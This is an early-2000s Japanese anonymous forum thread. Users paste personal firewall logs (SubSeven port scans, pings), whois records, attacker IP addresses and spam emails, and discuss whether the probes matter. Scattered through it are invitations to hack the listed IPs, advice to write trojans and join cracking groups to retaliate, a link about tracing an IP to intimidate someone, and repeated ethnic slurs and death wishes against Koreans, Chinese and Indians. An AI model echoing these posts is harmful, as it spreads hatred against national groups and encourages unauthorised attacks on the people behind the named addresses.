>>455
いや・・・・・
IPからいろいろ調べられていって進入されるかもしれんし

210.57.122.55
133.205.157.62
202.22.163.18
↑こいつらはハッカーに挑戦状叩きつけてるぞ
どんな攻撃もうけつけないらしい
スーパーハカーさん。実力みせて!

>>466
>>465が言ってる意味は違うと思うぞ。
市販ソフトのログを貼り付けることに何の意味があるのか？　ってことだべ？

>>469
>>463ってノートン？　
確かに張る事に意味があるとは思えないな。
>>466も「見たまま」って分かるレベルならいちいち張ることないと思うのだけど？
そういう意味で「貼り付け厨房」って言われたんじゃないかな？

このスレはアタックの内容より、それをしてきた奴を晒すのが目的なのでは？

見直してみたら、かなりｶｺﾜﾙｲﾏｼﾞﾚｽ...

From:JMC Marketing Concepts< [email protected] >
To: [email protected]
Subject:Attract The Opposite Sex NOW!
Date:**
Received: from [64.37.121.99] by em5000.com with ESMTP id **
X-Info: To report abuse forward this mail to [email protected] Please include all mail header fields!
Message-ID: < [email protected] >
---
NOW YOU CAN BE SIMPLY IRRESISTIBLE
TO SEXY MEN OR WOMEN! Get more smiles,
conversations, flirting and sex...virtually overnight!
http://www.thisproductworks.com/go7/
--
To unsubscribe go to
http://jab1.net/[email protected]&listname=jab2&msgid=01234567890
or to
http://jab1.net/unsub.php?client=jab1&listname=jab2&msgid=01234567890
and enter your email address ( [email protected] )

最後に受けた攻撃：　2002/02/14 21:22:16
最近の不正侵入試行　7
最近の攻撃元：　2
最も頻度の高い攻撃元：　210.0.181.114

最後に受けた攻撃：　2002/02/14 21:27:48
最近の不正侵入試行　4
最近の攻撃元：　1
最も頻度の高い攻撃元：　24.26.116.234

チャイナとカンコック、ウザすぎ

最後に受けた攻撃：　2002/02/14 21:47:24
最近の不正侵入試行　4
最近の攻撃元：　1
最も頻度の高い攻撃元：216.221.72.210

びっくりしたあ･･･

http://61.200.31.129/

as18.ade.ttcn.ne.jp

>>477
終了

80.11.187.106

>>479　何か抜けた？（ｗ

>>477　もう終わりなのかよ？

61.200.31.129

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.200.16.0-61.200.31.0
b. [ネットワーク名] TMC-DSL-6
f. [組織名] 東京めたりっく通信株式会社
g. [Organization] Tokyo Metallic Communications Corp.
m. [運用責任者] NK1321JP
n. [技術連絡担当者] DI189JP
p. [ネームサーバ] ns.metallic.ad.jp
p. [ネームサーバ] ns.metallic.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/03/08
[返却年月日]
[最終更新] 2002/01/21 14:52:01 (JST)
[email protected]

>>477　抜いたのなら晒せ〜（藁

最後に受けた攻撃：　2002/02/14 22:58:36
最近の不正侵入試行　3
最近の攻撃元：　1
最も頻度の高い攻撃元：24.103.76.200

（ ﾟДﾟ）ｺﾞﾙｧ !!　氏ね!!

ちっ。
ただのお遊びかよ。
ひとつくらい抜けよ・・・

>>486=484

<html>
<head>
<title> </title>
</head>
<!-- Background white, links blue (unvisited), navy (visited), red (active) -->
<body
bgcolor="#ffffff"
text="#000000"
link="#0000ff"
vlink="#000080"
alink="#ff0000"
>
おれなんもわるいことしてないのに
</body>
</html>

210.150.88.136

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.150.88.0-210.150.89.0
b. [ネットワーク名] LIVEDOORNET
f. [組織名] 株式会社ライブドア
g. [Organization] Livedoor,Inc.
m. [運用責任者] MK056JP
n. [技術連絡担当者] MK056JP
p. [ネームサーバ] ns0.livedoor.com
p. [ネームサーバ] ns1.livedoor.com
p. [ネームサーバ] ns2.livedoor.net
y. [通知アドレス] [email protected]
y. [通知アドレス] [email protected]
[割当年月日] 2001/05/17
[返却年月日]
[最終更新] 2001/05/30 15:26:23 (JST)
[email protected]

コイツうざい

日付: 2002/02/15 時刻: 0:13:58
規則 Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 のｾｷｭﾘﾃｨ警告を表示しました
ﾘﾓｰﾄｺﾝﾋﾟｭｰﾀ (62.136.81.173､ 1319)

ヨーロピアンらしい・・・

>>469
>>470
なーるほど。ただ２、３日前もほぼ同じアドレスから同じログがあったんで２つばかり貼ってみたんだ。
他の人のところでも繰り返してるのかとも思ったし、４６４で書いた疑問もあったし。
>>471 うんにゃ、むしろマトモな人だ。

a211-12-0-7.deploy.akamaitechnologies.com

なんじゃ？

210.147.90.177

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.147.0.0-210.147.255.0
b. [ネットワーク名] NEC-MESH
f. [組織名] C&Cインターネットサービスmesh
(日本電気株式会社)
g. [Organization] C&C Internet Service mesh
(NEC Corporation)
m. [運用責任者] TN265JP
n. [技術連絡担当者] NK032JP
p. [ネームサーバ] ns02.mesh.ad.jp
p. [ネームサーバ] ns03.mesh.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 1997/02/26
[返却年月日]
[最終更新] 2001/06/21 16:29:30 (JST)
[email protected]

NECって・・・・・

>>492
MESHのユーザだろ？
社員とでも思ったのか？（ｗ

ドメインサービス使っても意味が分からないんじゃしょうがないな（ｗｗ

いつもはシナなんですが、カントリー：ＩＮってどこの国ですか？
61.11.33.101

英国だろ

イングランドやね

211.198.178.73
211.110,167,151

同一人物から
きもいよ氏んでください

>>491
RealAudioでStreaming聴かなかった?

>>497
同一人物ってなんでわかったの？

61.196.13.147
勘弁してくれ。腹の底からｵｶｼｲから（ﾜﾗ）

アメリカからトロイの木馬が･･･

12.225.201.244

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)

PacificNet (NETBLK-PACIFICNET-BLK-3)
19725 Sherman Way Suite 395
Canoga Park, CA 91306
US

Netname: PACIFICNET-BLK-3
Netblock: 209.204.0.0 - 209.204.63.255
Maintainer: PACN

Coordinator:
Elliot, Richard (RE135-ARIN) [email protected]
818-464-2659 (FAX) 818-464-2799

Domain System inverse mapping provided by:

NORTH.PACIFICNET.NET 207.171.0.10
SOUTH.PACIFICNET.NET 207.171.0.9

ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE

Record last updated on 16-Apr-1999.
Database last updated on 14-Feb-2002 19:56:41 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

初めてBlackICEの真赤な警告見たので記念カキコ。

アタック: TCP data changed
侵入者: 209.103.170.82　この侵入者に関する詳細はわかっていません。
[侵入の疑い]
アタッカは、TCP接続のハイジャックを試みている可能性があります。

>>503

あ、それね、
串さして加えてリファラーいじってダウンローダーなんか使ってると
串元からそういうアタック？イベント？が起きるよ。

死ねこじき朝鮮総連のうじ虫
調子に乗るな

2箇所から秒単位で…、ウザいんですけどー！

日付: 2002/02/16 時刻: 9:46:17
未使用ﾎﾟｰﾄ遮断機能が通信を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 202.232.206.178,6699

日付: 2002/02/16 時刻: 9:44:43
未使用ﾎﾟｰﾄ遮断機能が通信を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 66.161.166.135,6699

MXやってるわけでもないのに。

日本システムウェアという会社から
頻繁にポートが叩かれる（pingも）
211.123.197.3

後、韓国から頻繁にポート80を叩かれる
本当多いね･･･うざい
203.251.129.189

From:FunnyMoney< [email protected] >
To: [email protected]
Subject:CONGRATULATIONS-You've Won!
Date***
Received: from [207.33.16.73] by mb00.net with ESMTP id ***
Received: (from localhost)by mb00.net (8.8.8pmg/8.8.5) id ***
From [email protected]
Message-Id:< [email protected] >
X-Info: Message sent by Mindshare Design customer with ID "funnymoney"
X-Info: Report abuse to list owner at [email protected]
---
CONGRATULATIONS - You've Won A Chance To
Test-Drive Our Fool-Proof "Instant Cashflow System"!
You have the opportunity to get a COMPLETE Money-Making
Internet Home Business and receive over $990.00 worth of
internet marketing courses, products, and training materials.
URGENT: Your COMPLETE Money-Making Home Business and
EZ Study Materials are waiting for you to claim them today ONLY.
Due to the time-sensitive nature of this opportunity, we must give your
package to someone else if you do not respond within the allotted time.
Click The Link Below NOW To See If Your Package Is Still Available:
http://www.cashflowcenter.com/claimprize
<<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>>
* To remove yourself from this mailing list, point your browser to:
http://i.mb00.net/remove?funnymoney:10
* Enter your email address ( [email protected] ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney:10".
OR...
* Reply to this message with the word "remove" in the subject line.

IP: 203.165.6.146
DNS: cj3033098-a.shibuya1.kt.home.ne.jp

不正アクセスの送信元　IP:218.138.180.123
不正アクセスの種類　Ping Attack
ってさっきからずっとなってるんですけど
これはやばいんですか？

61.198.169.66 荒らし

　　　　　　　　　　　　ヘ-+------+--+-----+ヽ＿
　　　　　　　　　　／:::|:::::::|:::::::::::::/::::::/::::::::::::::/:::::::/`＼＿ IP: 203.165.6.146
　　　　　　 ／￣＼::::::|:::::/:::......-―――--..........__/:::::::::::::::＼ ★★★★★★★★★
　　　┌ー￣::::::::::::ヽ::|:::..-^￣　　　　　　　　　　　 ^ ヽ、:::::::::＼　　　　cj3033098-a.shibuya1.kt.home.ne.jp
　　　ヽ::::::::::::::::::::::::::::／　　　　　　　　　　　　　　　　　　＼::::::::ヽ
　　　 ヽ:::::::::::::::::::::::/　　　　　　　　　　　　　::::　　　　　　　＼:::::ヽ
　　　　ヽ::::::::::::::::::/　　　　　　　　　　　　　 ::::::::　　　　　　　 ＼::::|_
　　　　　）:::::::::::::::|　　　　　　　　　　　　　 ::::*:::::　　　　　　　　ヽ:|::::ヽ
　　　　 /::::::::::::::::|　　　　　　　　　　　　　　::;;;;:　　　　　　　　　　l::::::::ヽ
　　　　/::::::::::::::::::|　　　　　　　　　　　　　ﾉ::ii:ヽ::　 　　　　　　　　l::::::::::|
　　　　|::::::::::::::::::::|　　　　　　　　　　　　/::::;ﾘ:::l::::　　　　　　　　　|::::::::::::|
　　　　|:::::::::::::::::::::l　　　　　　　　　　　...l::::;ﾘ:::/::　　　　　　　　　/:::::::::::::|
　　　　.|::::::::::::::::::::::l　　　　　　　　　　. /:ア／:::　　　　　　　　／:::::::::::::::i
　　　　l:::::::::::::::::::::::::l　　　　　　　　　 ./::`^:::::　　　　　　　　／:::::::::::::::::/
　　　　ヽ::::::::::::::::::::::::l　　　　　　　　 /::::::::::　　　　　　　　／:::::::::::::::::::/
　　　　　/:::::::::::::::::::::::l　　　　　　　 /:::::::::::::　　　　　　／::::::::::::::::::::::/
　　　　　/::::::::::::::::::::::::i　_＿-ー--=;;;::::::::::::::　　....::::／:::::::::::::::::::::::／
　　　　./:::::::::::::::::::::::::::i":::::::::::::::　　ヾ─ 、／"ヽ:／::::::::::::::::::::::::::::l
　　　　　ヽ::::::::::::::::::::::丶::::::::::　　　/　　　il　　　.ヽ:::::::::::::::::::::::::::/
　　　　　　 ＼::::::::::::::::::::ヽ:::::::　　/　　　　l !　　　　ヽ:::::::::::::::::::/
　　　　　　　　　ii::::::::::::::::::` -::-/　　　　 / .i　　　　　ヽ::::::::／
　　　　　　　　　　-----￣丶/　　　　　lヽ　　　　　　　ヽ/
　　　　　　　　　　　　　　　　/　　　　　 l　^ヽ..　　　　　　ヽ
　　　　　　　　　　　　　　　 /　　　　　　ｌ　　　ヽ　　　　　　.ヽ
　　　　　　　　　　　　　　　l　　　　　　 .ｌ　　　　ヽ　　　　　　/
　　　　　　　　　　　　　　 丶　　　　　　ｌ　　　　 ヽ　　　　　 .l
　　　　　　　　　　　　　　　ヽ　　　　　 l　　　　　l　　　　　／
　　　　　　　　　　　　　　　　ヽ＿＿_../　　　　　 .ヽ---／

203.204.191.103
↑うざいです、台湾人が攻撃してきます。

211.187.39.128
なんですけどＩＰドメインサーチで引っかかんないんですけど
こういうことってあるんですか？

ウィルス送ってみろよ。最強のウィルスバスター君が跳ね返すぜ!！

[email protected]

　

>>514

ttp://www.ripe.net/perl/whois

nnsuserb020.nns.ne.jp
↑ウザイ！調子乗りすぎている！

[email protected]
3月16日(土）の夕方、第2回関西オフ会を開こうと思います。幹事は前回と同様ファ
ナティックさんと、僭越なが私がさせていただきます。場所は梅田周辺。会費は未
定ですが、一応五千円位と見込んでおいて下さい。今回は人数によって開催方式を
変えたい・・・ある程度以上だったら、東京の様に会議室貸切を検討中です・・・
と思っていますので、一応の人数を確認したく、取り急ぎ、参加ご希望の方は2月25
日(月）までに、私までメール下さい。勿論前回同様、ROM専門の方でも、大歓迎デ
スヨ!!
では・・・

おれにんじゃだけど
http://www.clickjump.net/thepri/
なんかもんくある？
くやしかったら荒らしてみなはげしねぼけ

トロイで攻撃されるよ。今年に入って17回ほどだけど段々ひどくなる。
どおしたらいいでしょうか？コイツです。↓
日付: 2002/02/16 時刻: 23:53:30
規則「Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断」が pcv-j12,27374 を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは pcv-j12,27374
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 80.195.56.109,2844
ﾌﾟﾛｾｽ名は N/A

Pink News from Japan volume 376

Oh! is this real?
http://www.lactatingheshe.com/

Please enjoy these "girls"
http://www.lactatingheshe.com/girl1

http://www.lactatingheshe.com/girl2/

http://www.lactatingheshe.com/girl3/

http://www.lactatingheshe.com/girl4/

http://www.lactatingheshe.com/girl5/

http://www.lactatingheshe.com/girl6/

[New] PINK-TV from jAPAN.

PINK-TV が生まれ変わりました。

http://www.pink-tv.com/
誰でも簡単に見られるように、
大画面で迫力のある映像が見られるように、
Microsoft windows media に対応しました。

もちろん、いままでどおり No モザイクです。
サンプルはこちら、
http://www.pink-tv.com/2001/movies.html

Pink-TV は、この五年間に世界最大級の動画サイトに成長しました。
さらに毎週毎週、より高画質な動画が追加されつづけています。
ぜひ、ご覧下さい。

フル画面まで、あと少しのところまで技術が進歩しました。
とくに　ADSL 等をお使いの方は、迫力のあるアダルトビデオを
居ながらにしてご覧いただけます。

Pink-TV will continue to bring you the best XXX video from Japan,
and you will always get quality porn!

Pink-TV http://www.pink-tv.com/

____________________________________
This is an opt in newsletter. It is only sent to subscribers.
It is only for adults.
If you would like to unsubscribe, please click on this link,
and enter your email, you will be removed.
http://www.emailpink.com/remove.html
削除は、上のリンクをクリックして指示に従ってください。
Replying to this email will remove you too.

----------------------------
to:=******@hotmail.com=:

日付: 2002/02/17 時刻: 13:47:11
規則 Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 のｾｷｭﾘﾃｨ警告を表示しました
ﾘﾓｰﾄｺﾝﾋﾟｭｰﾀ (66.130.76.103､ 1659)

逝ってよし

>>521
俺も同じような感じです・・・。
さっき、211.109.30.203と218.53.1.34からトロイで攻撃されたらしい。
どっちも韓国かららしい。

オレの所は毎日訪問されています（糞
昨日は韓国、今日はオーストラリアでした。

inetnum: 202.72.128.0 - 202.72.159.255
netname: WESTNET
descr: WestNet Pty Ltd
descr: Perth, Western Australia
country: AU
admin-c: CT65-AP
tech-c: CT65-AP
mnt-by: APNIC-HM
changed: [email protected] 19991104
source: APNIC

person: Chris Thomas
address: L32, 44 St. George's Tce
address: Perth WA 6000
country: AU
phone: +61-8-9218-2600
fax-no: +61-8-9218-2666
e-mail: [email protected]
nic-hdl: CT65-AP
mnt-by: MAINT-AU-WESTNET
changed: [email protected] 20000104
source: APNIC

みなさんも攻撃があるんですね。ちょっと安心。
ところで韓国とかオーストラリアとかどおやって調べるんですか？

>>526

IP search（定番）
http://www.ip-domain-search.com/

nslookup(IPからドメインを割り出す)
http://www8.big.or.jp/~000/CyberSyndrome/nslookup.html

世界地図検索？
http://test2.cybertrader.com/

おまけ（国名）
http://www.friendlylab.co.jp/ebiz/itword/page_49.html

ところでカウンター喰らわせる方法誰か知らない？
イタチごっこ＆エスカレートになりそうだけど・・・

aaaaa

>>527ありがとうございました。
私の相手は■U.S.EDUCATION NETWORK■からだそうです。
日本じゃなくてちょっと安心。

またきた・・・・211.215.33.172
本当に韓国からなんだろうか・・・？

>>523-530
トロイを送り込んでいるのを遮断しているんじゃなくて
トロイが仕込まれているマシンを探しにきているのを
ブロックしているだけなんだから、何の心配もいらんぞ。
意味分かる？

>>531ん？ということは、そいつはいいやつなの？ブロックしない方がいいの？

>>532
別にいいヤツではないよ。他人が仕込んだトロイをかぎまわって
悪用しようとしているんだからね。。。
ただ、自分のマシンにトロイが仕込まれていなければ別に気にする
必要は全くない。

>>533 どおも。ありがとうございました。一安心です。

>>>527
カウンター
一番の近道は自分がトロイやウイルスを作成できるスキルを待たなければ相手にダメージを与えれない
後、世界にちらばるグループに早めに参加したほうが良いかも。
とあるグループは１０００人いたよ。蛇の道は蛇。
国際警察に捕まる事を覚悟の上で参加しろよ

＿＿＿＿正常人ならセキュリティポリスの人達にログを渡し、警告与えてください＿＿＿＿って言うのが一番かも。。。。。

・・・ところで現在攻撃続けている奴がいるんだけれども、
（66.108.79.226）しつこいですな

ログとってあるんでこれからそいつのいる場所に警告をお願いしてきます。

http://life.2ch.net/test/read.cgi/jinsei/1013932671/l50
なおこって電波がIP抜いて、旦那の知り合いの若いもん使って
追い込みかけるそうです

はーいはい。
分りましたよ。ウザイ奴。
同時にハッキングしていたから自分の技術を見てほしいんでしょ。
分りましたって。

先程の奴は２台を同時使用して自分のパソコンにアクセスしています。
んで、そいつのIPさらし　A　G　E
146.172.82.109

>>535
ROADRUNNER-NYC (NETBLK-ROADRUNNER-NYC-1)
13241 Woodland Park Road
Herndon, VA 20171
US

Netname: ROADRUNNER-NYC-1
Netblock: 66.108.0.0 - 66.108.255.255
Maintainer: RRNY

おいらセキュリティに関してまったくﾄｰｼﾛなんだけど、
はじめて攻撃を受けた感じぃ。
ノートンが初めてﾄﾛｲ攻撃防止したって逝って来てちとびびってるよ
閑人さん解析、解説して。
211.110.57.29 って言うから調べたら、
みんなの好きな半島からの攻撃よ。ﾑｶ


% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum: 211.104.0.0 - 211.119.255.255
netname: KRNIC-KR
descr: KRNIC
descr: Korea Network Information Center
country: KR
admin-c: HM127-AP
tech-c: HM127-AP
remarks: ******************************************
remarks: KRNIC is the National Internet Registry
remarks: in Korea under APNIC. If you would like to
remarks: find assignment information in detail
remarks: please refer to the KRNIC Whois DB
remarks: http://whois.nic.or.kr/english/index.html
remarks: ******************************************
mnt-by: APNIC-HM
mnt-lower: MNT-KRNIC-AP
changed: [email protected] 20000414
changed: [email protected] 20010606
source: APNIC

>>539ともども
だからよ〜、何でみんな分からんのかね。トロイを仕込もうと攻撃しているん
じゃなくて、トロイの仕込まれているマシンを探しているだけなの。
トロイ自体は遠隔操作のプログラムなんだから、例えばメールで添付ファイル
として送って実行させるとかしないとトロイを仕込むのは無理なの。
言っている意味分かる？

% This is the RIPE Whois server.
% The objects are in RPSL format.
% Please visit http://www.ripe.net/rpsl for more information.
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html
inetnum: 62.98.162.0 - 62.98.162.255
netname: WIND-FREE
descr: Wind Telecomunicazioni spa
country: IT
admin-c: NMS18-RIPE
tech-c: NMS18-RIPE
tech-c: NMS18-RIPE
status: ASSIGNED PA
mnt-by: WIND-MNT
changed: [email protected] 20000929
changed: [email protected] 20020215
source: RIPE
route: 62.98.0.0/16
descr: WIND Telecomunicazioni spa
descr: Global Telecommunication Provider
origin: AS9034
mnt-by: WIND-MNT
changed: [email protected] 20000824
source: RIPE
person: Network Management Staff
address: WIND Telecomunicazioni spa
address: Via C.G.Viola 48
address: I-00148 Roma (RM)
address: Italy
phone: +39 06 83111
fax-no: +39 06 83111
e-mail: [email protected]
nic-hdl: NMS18-RIPE
changed: [email protected] 20000403
source: RIPE
Bold: Object type.
Underlined: Primary key(s).
Hyperlinks: Searchable Inverse Attributes.

http://www.e-words.ne.jp/view.asp?word=%83g%83%8D%83C

CYBERMAN:210.81.34.33
中華人民共和国より愛を込めて:210.77.152.43
スポーリア湯沢：210.161.199.82(踏み台？)
田中○○氏：210.134.81.146
香港からの手紙：210.3.43.47

以上、本日BlackICEでかかりました。

Proto Remote Address State
TCP 80.135.177.180:21 LISTENING
TCP 80.135.177.180:79 LISTENING
TCP 80.135.177.180:389 LISTENING
TCP 80.135.177.180:135 LISTENING
Completed. hecking

IP: 218.19.24.82
Node: ﾁｦﾁ<FA>
Group: WORKGROUP
MAC: 444553547777
DNS: ﾁｦﾁ

ところでお前ら、ウザイ奴ってどう対処してるの？
ここに垢して終わり？

最近来てははじかれてる奴のIP晒しとくよ、好きにしておくれ。
61.214.163.93 61.214.94.100

61.182.248.125










はぁ〜。

61.39.179.2
61.76.190.215
161.247.39.169
61.74.115.237

こいつらウザイ
少し前にＨＤＤ飛んだし
こいつらの仕業か？

>>549
パソコンの電源切る前に、LANカード抜いたらいいよ。
シャットダウンの操作の時に来ると、頭くるよね。

２／１８（月）　Ｊ．Ｍ．ウェストンのタッセルモカシン（ダークブラウン）

今日は、ウィークディーのスタートなので、朝一番の足入れが楽な、スリッポンタイプのタッセルモカシンをセレクトしました。
月曜日は週末の哀愁が残って、必ずしも毎回ではありませんが、スリッポンタイプを履くことが多いです。
このＪ．Ｍ．ウェストンのタッセルモカシンは、華やかな雰囲気のある靴と思います。
小さめ甲と三角形に突き出たバンプのサイド部分のバランスが絶妙で、魅力的で華麗なデザインです。
さらには、一目でＪ．Ｍ．ウェストンとわかる他のブランドにはないオリジナリティーも感じます。
タッセル飾りもカッチリしていて、あまり左右に位置がぶれることなく、ほぼ中央に収まります。
このタッセル飾りが、ネクタイと相性がいいので、スーツともコーディネートしやすいです。

革の品質管理に厳しいＪ．Ｍ．ウェストンとしては珍しく、サイド部分がつま先を一周して踵まで１枚の革で造られていて、いかにも上質な感じがします。
しかも、７割以上がハンドメイドの７分仕立てですので、１枚革でありながら土踏まず部分の盛り上がり感が見事でして、履き心地も良いです。
踵も裏革の生地がむき出しになっていて、滑り止めの効果があって浮きにくくなっています。
ただ、この踵の裏革生地に関係なく、私の足に合っているのか、スリッポンタイプとしては、最高の履き心地です。

以前はシップスで扱っていましたが、残念ながら、現在は日本では売っていません。
パリでは、スリッポンタイプながら、日本で売っている７分仕立てのストレートチップ（１１８，０００円）よりも高価になったので、日本で売るとなるとかなりの高額になるので、しょうがないかもしれません。
あまりフアンのいない靴ではありますが、個人的にはとても気に入っています。

>>551
モカシンって汚れがいずれ目立つかと。
どうしたらいい？

Received: from denchristian2.denver-christian.org (EHLO exserver.denver-christian.org) (199.239.45.2) by mb00.net with SMTP;***
From: [email protected]
Subject: News Update: Diamond Entertainment Corp.
Reply-to: [email protected]
-----
For latest news on Diamond Entertainment Corp. (SYMBOL: DMEC), click this link:
http://finance.yahoo.com/q?s=dmec.ob&d=v1
---
Disclaimer: The writers of this e-mail do not make specific trading
recommendations or give individualized market advice. Information contained in
this e-mail is provided as an information service only. It is recommended that
you get personal advice from an investment professional before buying or
selling stocks or other securities. The securities markets are highly
speculative areas for investments and only you can determine what level of risk is
appropriate for you. In no way should this be construed as a
recommendation to buy or sell a particular security.

All our mailings are sent complying to the proposed United States Federal
requirements for commercial e-mail: Section 301 Paragraph (a)(2)(C) of S.
618. Please see the bottom of this message for further information and
removal instructions.

This is not a spam! Your are receiving this email either because, you have
sent me and email in the past, or you are on a list of marketers requesting
information. If this is not the case, PLEASE accept my sincerest apologies
and reply with "remove" in the subject field. I will remove your name
immediately!

お尋ねします。

国レベルでアクセスを断ちたいと思って、IP アドレスと
国とのリストを探しているんですが、どこかに落ちてません？

一応、アクセスが多くて日本も含まれる IP アドレスは、下
のように調べたんですが、多すぎてラチが明きません。
XXX.XXX.0.0/16 のレベルでいいんですが。

------------------------------------------

たとえば 61.0.0.0/8 (APNIC / NETBLK-APNIC2)
0-23 : Asia小国
24-27 : J
28- : Cn, Au...
32-48 : Kr
49-55 : Cn
56-67 : Tw
68 : Au
70-71 : Tw
72-85 : Kr
88- : Au,-
92- : Asia小国
96-111 : Kr
112-127 : J
128-191 : Cn
192-215 : J
216-231 : Tw
232-237 : Cn
240-243 : Cn
248-255 : Kr

------------------------------------------

中国と韓国は元から断ちたいです。よろしく。

10.195.3.15

毎晩毎晩うざい。
ＩＡＮＡの社員？

いつも大体この時間になるとスキャンがくる
できょうはこいつ
12.246.173.252

Time Warner Telecom (NET-TWTELECOM-COM)
3235 Intertech Drive, Suite 600
Brookfield, WI 53045
US

Netname: TWTELECOM-COM
Netblock: 168.215.0.0 - 168.215.255.255
Maintainer: TWTC

Coordinator:
Time Warner Telecom (ZT87-ARIN) [email protected]
800-898-6473

Domain System inverse mapping provided by:

NS1.MILW.TWTELECOM.NET 216.136.95.2
NS1.IPLT.TWTELECOM.NET 64.132.94.250
NS1.ORNG.TWTELECOM.NET 168.215.210.50

Record last updated on 26-Sep-2001.
Database last updated on 19-Feb-2002 19:57:50 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)

IANA (IANA-CBLK-RESERVED)
Internet Assigned Numbers Authority
4676 Admiralty Way, Suite 330
Marina del Rey, CA 90292-6695
US

Netname: IANA-CBLK1
Netblock: 192.168.0.0 - 192.168.255.255

Coordinator:
Internet Corporation for Assigned Names and Numbers (IANA-ARIN) [email protected]
(310) 823-9358

Domain System inverse mapping provided by:

BLACKHOLE-1.IANA.ORG 192.0.32.18
BLACKHOLE-2.IANA.ORG 192.0.32.19

These blocks are reserved for special purposes.
Please see RFC 1918 for additional information.

Record last updated on 12-Oct-2001.
Database last updated on 19-Feb-2002 19:57:50 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.


意味が分かりません。誰か教えてくれませんか？

>>558
プライベートIPアドレス引いたって何も出てきやしないよ

>>559
あの・・どういう意味でしょうか・・？よかったら教えて
もらえないでしょうか？

Netname: RIPE-213
Netblock: 213.0.0.0 - 213.255.255.255
Maintainer: RIPE

Coordinator:
Reseaux IP European Network Co-ordination Centre Singel 258 (RIPE-NCC-ARIN) [email protected]
+31 20 535 4444

Domain System inverse mapping provided by:

NS.RIPE.NET 193.0.0.193
NS.EU.NET 192.16.202.11
AUTH00.NS.UU.NET 198.6.1.65
NS3.NIC.FR 192.134.0.49
SUNIC.SUNET.SE 192.36.125.2
MUNNARI.OZ.AU 128.250.1.21
NS.APNIC.NET 203.37.255.97
SVC00.APNIC.NET 202.12.28.131

Record last updated on 08-Apr-1999.
Database last updated on 19-Feb-2002 19:57:50 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information

クラス A 010.000.000.000 〜 010.255.255.255 サブネットマスク255.0.0.0
クラス B 172.016.000.000 〜 172.031.255.255 サブネットマスク255.255.0.0
クラス C 192.168.000.000 〜 192.168.255.255 サブネットマスク255.255.255.0

日付: 02/02/20 時刻: 21:40:06
ｱﾄﾞﾚｽ 213.64.95.234 からの不正侵入の試みを規則 Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 によって検出しました｡
以降のｱｸｾｽを 30 分間遮断しました｡

日付: 02/02/20 時刻: 22:37:47
ｱﾄﾞﾚｽ 216.143.62.121 からの不正侵入の試みを規則 Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 によって検出しました｡
以降のｱｸｾｽを 30 分間遮断しました｡

日付: 02/02/20 時刻: 23:22:55
ｱﾄﾞﾚｽ 203.77.206.24 からの不正侵入の試みを規則 Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 によって検出しました｡
以降のｱｸｾｽを 30 分間遮断しました｡

ﾌｧｲｱｳｫｰﾙは 10.14.0.20. から、このｺﾝﾋﾟｭｰﾀ (ICMP Echo Request ('Ping')) への ｲﾝﾀｰﾈｯﾄ ｱｸｾｽをﾌﾞﾛｯｸしました。

日時: 02/02/20 22:53:22

さっきからUzeeeeeeeeeeeeeeeee
反撃できないの？

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)

inetnum: 203.77.192.0 - 203.77.207.255
netname: GIPLNET
descr: GIPL
descr: INTERNET SERVICE PROVIDER
descr: GUJARAT
descr: INDIA
country: IN
admin-c: GI11-AP
tech-c: GI11-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-IN-GIPL
changed: [email protected] 20010904
source: APNIC

route: 203.77.192.0/20
descr: GIPLNET
country: IN
origin: AS17913
notify: [email protected]
mnt-by: APNIC-HM
changed: [email protected] 20010907
source: APNIC

person: GIPL India
address: 3 Rd Floor
address: Block 15
address: Udyog Bhavan
address: Sector 11
address: Gandhinagar
address: Gujarat
address: India
country: IN
phone: +91-79-3236372
fax-no: +91-79-3238648
e-mail: [email protected]
nic-hdl: GI11-AP
mnt-by: MAINT-NEW
changed: [email protected] 20010807
source: APNIC

インドのくせに・・・・
殺して！！

>>566
